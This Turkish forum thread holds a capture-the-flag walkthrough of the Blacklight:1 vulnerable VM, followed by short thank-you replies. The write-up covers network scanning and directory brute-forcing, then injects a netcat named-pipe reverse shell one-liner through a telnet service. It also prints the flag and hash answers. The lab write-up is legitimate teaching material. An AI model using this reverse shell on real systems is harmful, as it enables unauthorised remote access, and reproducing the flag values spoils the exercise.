İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Blacklight:1 Açıklı Makine Çözümü 'Rairsa

12-09-2018 21:18
#1
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65

Merhaba THT ailesi
Sizlere bugün Blacklight:1 açıklı makine çözümünü anlatacağım.


Blacklight:1'i BURADAN indirebilirsiniz.

Görevler;
1-Flag1
2-Flag2
3-Hash

Öncelikle;
Kod:
netdiscover
parametresi ile makinemizin ip adresini öğrenelim.




IP adresimizi öğrendiğimize göre nmap ile tarama yapalım
Kod:
nmap -p- -A 10.0.2.9


Tarama sonuçlarına baktığımızda 80. port ve 9072 numaralı bilinmeyen bir port açık.


IP adresimizi tarayıcımıza yazalım bakalım neler varmış



Karşımıza bir web sayfası çıktı ve içinde "Acemi Düzeyde CTF" yazıyor.

Dirb programı ile taratalım

Kod:
dirb http://10.0.2.9/


Tarama sonucunda robots.txt adında ki sayfa dikkatimi çekiyor. Linki kopyalayıp tarayıcımıza yapıştıralım.

Kod:
10.0.2.9/robots.txt


Sayfa içinde "flag1.txt" yazıyor. Url'mizin sonuna yapıştıralım.

Kod:
10.0.2.9/flag1.txt


İlk bayrağımızı bulduk. Ancak alt tarafta bir şeyler daha yazıyor.
"9072. Sır evde"
Hatırlarsanız nmap ile makinemizi taratmıştık ve 9072 numaralı ismi bilinmeyen portta açık vardı.

Buradan yola çıkarak telnet ile açıklı makineye bağlanmayı deneyelim.
Kod:
telnet 10.0.2.9 9072


Telnet ile makinemize bağlandık. Şimdi ise reverse shell'imizi enjecte edelim.

Reverse shell'leri BURADAN bulabilirsiniz.

Reverse shell'imizi yazmak için .exec yazıyoruz.

Not: Shell'imizi yazdıktan sonra "enter" tuşuna basmıyoruz enter tuşuna portu dinlerken basacağız.

Kod:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ipadresiniz portnumarası >/tmp/f
İp adresinizi "ifconfig" yazarak öğrenebilirsiniz. Port numarası olarak ben 4444'ü kullandım.

Shell'imizi yazdıktan sonra sıra port'u dinlemekte

Kod:
nc -lvp 4444


Makinemize sızmayı başardık. Hatırlarsanız flag1.txt sayfasında "The secret is at home" yazıyordu.
Şu anda root dizinindeyiz "cd .." yaparak ana dizine geçmeyi deniyelim.



Şimdi "cd home" yazarak home dizinine geçelim.

home dizinine geçtikten sonra ls komutu ile dizinin içine bulunanları listeleyelim.
blacklight adlı klasör karşımıza çıktı "cd blacklight" yazalım.
Tekrardan "ls" komutu ile blacklight dizininin içinde bulunanları listeleyelim.
Karşımıza "console.rb" ve "hash.txt" adlı iki dosya çıktı.
"cat hash.txt" yazarak hash dosyamızı okuyalım.




Şimdi sıra flag2'yi bulmaya geldi.

Hatırlarsanız flag1 sayfasında "The secret is at home" yazıyordu bunun anlamı Gizli/Sır evde.

Basit mantık kurarak biz home/blacklight dizinindeyiz.
Cümlemizdeki sır kelimesi "ls -a" parametresi olabilirmi?



Not : ls -a parametresi bulunduğunuz dizindeki gizli dosyaları gösterir.

Resmin alt taraflarında ".secret" adlı klasör olduğunu görüyoruz.
"cd .secret" yazarak bu klasörün içine girmeyi deneyelim ardından "ls" komutu ile klasörün içindekileri listeleyelim



Flag2'yi bulduk ancak .jpg formatında bulduk. Flag2'yi daha yakından incelemek için;

Kod:
cp flag2-inside.jpg /var/www/html
Makinemiz bir web sitesiydi bu komut ile flag2'yi web sitesinin içine koyduk.

Flag2'yi daha yakından incelemek için tarayıcımıza;

Kod:
10.0.2.9/flag2-inside.jpg
yazıyoruz.



Resimde dikkat ettiyseniz OUT ve GUESS yazıları büyük. OUTGUESS'i google'da kısa bir araştırmadan sonra outguess diye bir tool'a ulaştım.
Programın GitHub sayfasına BURADAN ulaşabilirsiniz.

Bu resmi masaüstüne kaydediyoruz ve yeni bir terminal açıp içine
Kod:
cd Desktop
yazıyoruz ardından
Kod:
git clone https://github.com/crorvick/outguess.git
yazıyoruz

Programımız indikten sonra terminale "cd outguess" yazıyoruz
sonra terminale
Kod:
./configure && make
yazıyoruz.



Terminale(outguess klasörünün içindeki terminale)
Kod:
./outguess -r /root/Desktop/flag2-inside.jpg -t flag.txt
yazıyoruz.

Tekrardan terminale gelip
Kod:
cat flag.txt
yazıyoruz ve



Flag2'yi buluyoruz

Flag1:fc4c7223964a26b152823d14f129687207e7fe15
Flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4
Hash:b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb97741 3a932a828b5c52ef5a6

Makinenin çözümü bu kadar Eğer anlamadığınız bir yer olursa yorumlara yazabilir veya öm atabilirsiniz.
'Rairsa
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
Belvando, 'Flash, SerdarCoruk Teşekkür etti.

12-09-2018 21:21
#2
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86
Eline Sağlık
12-09-2018 21:26
#3
4UR0R4 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2018
Nereden:
T.C
Mesajlar:
666
Teşekkür (Etti):
125
Teşekkür (Aldı):
145
Konular:
72
Eline Sağlik Devrem
Kullanıcı İmzası
Tarihini bilmeyen millet yok olmaya mahkumdur….
Mustafa Kemal AtaTÜRK


Sayilmayiz Parmakla Ölmeyiz Vurulmakla...
12-09-2018 21:31
#4
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
4UR0R4´isimli üyeden Alıntı Mesajı göster
Eline Sağlik Devrem
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Eline Sağlık
Teşekkür ederim
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
12-09-2018 21:33
#5
Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
237
Teşekkür (Etti):
55
Teşekkür (Aldı):
198
Konular:
34
Ellerine sağlık, umarım bu serinin devamını getirirsin.
Kullanıcı İmzası
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
12-09-2018 22:00
#6
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
Belvando´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, umarım bu serinin devamını getirirsin.
Teşekkür ederim devamını getirmeyi düşünüyorum
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
26-09-2018 11:56
#7
oldnco - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Yaş:
29
Mesajlar:
1.525
Teşekkür (Etti):
636
Teşekkür (Aldı):
370
Konular:
43
Eline sağlık rairsa.
02-10-2018 18:40
#8
MwTugi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
4
Mesajlar:
4.886
Teşekkür (Etti):
334
Teşekkür (Aldı):
1616
Konular:
376
Abi şöyle güzel bir konuya neden 2 - 3 yorum gelmiş bakın inceleyin la bi
Kullanıcı İmzası
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
02-10-2018 18:42
#9
'Rairsa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
-
Mesajlar:
329
Teşekkür (Etti):
198
Teşekkür (Aldı):
59
Konular:
65
Alıntı:
MwTugi´isimli üyeden Alıntı Mesajı göster
Abi şöyle güzel bir konuya neden 2 - 3 yorum gelmiş bakın inceleyin la bi
Teşekkürler
Kullanıcı İmzası
"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
02-10-2018 18:53
#10
bytural - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2017
Nereden:
Baku
Mesajlar:
88
Teşekkür (Etti):
28
Teşekkür (Aldı):
5
Konular:
23
Baya guzel ve degerli bir konu zahmetinin karwil;igini alarsin inweallah Ellerine saglik dahada irelilemeni diliyorum
Kullanıcı İmzası
Bildiklerim Bilmediklerimin 0.0001% ediyor.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı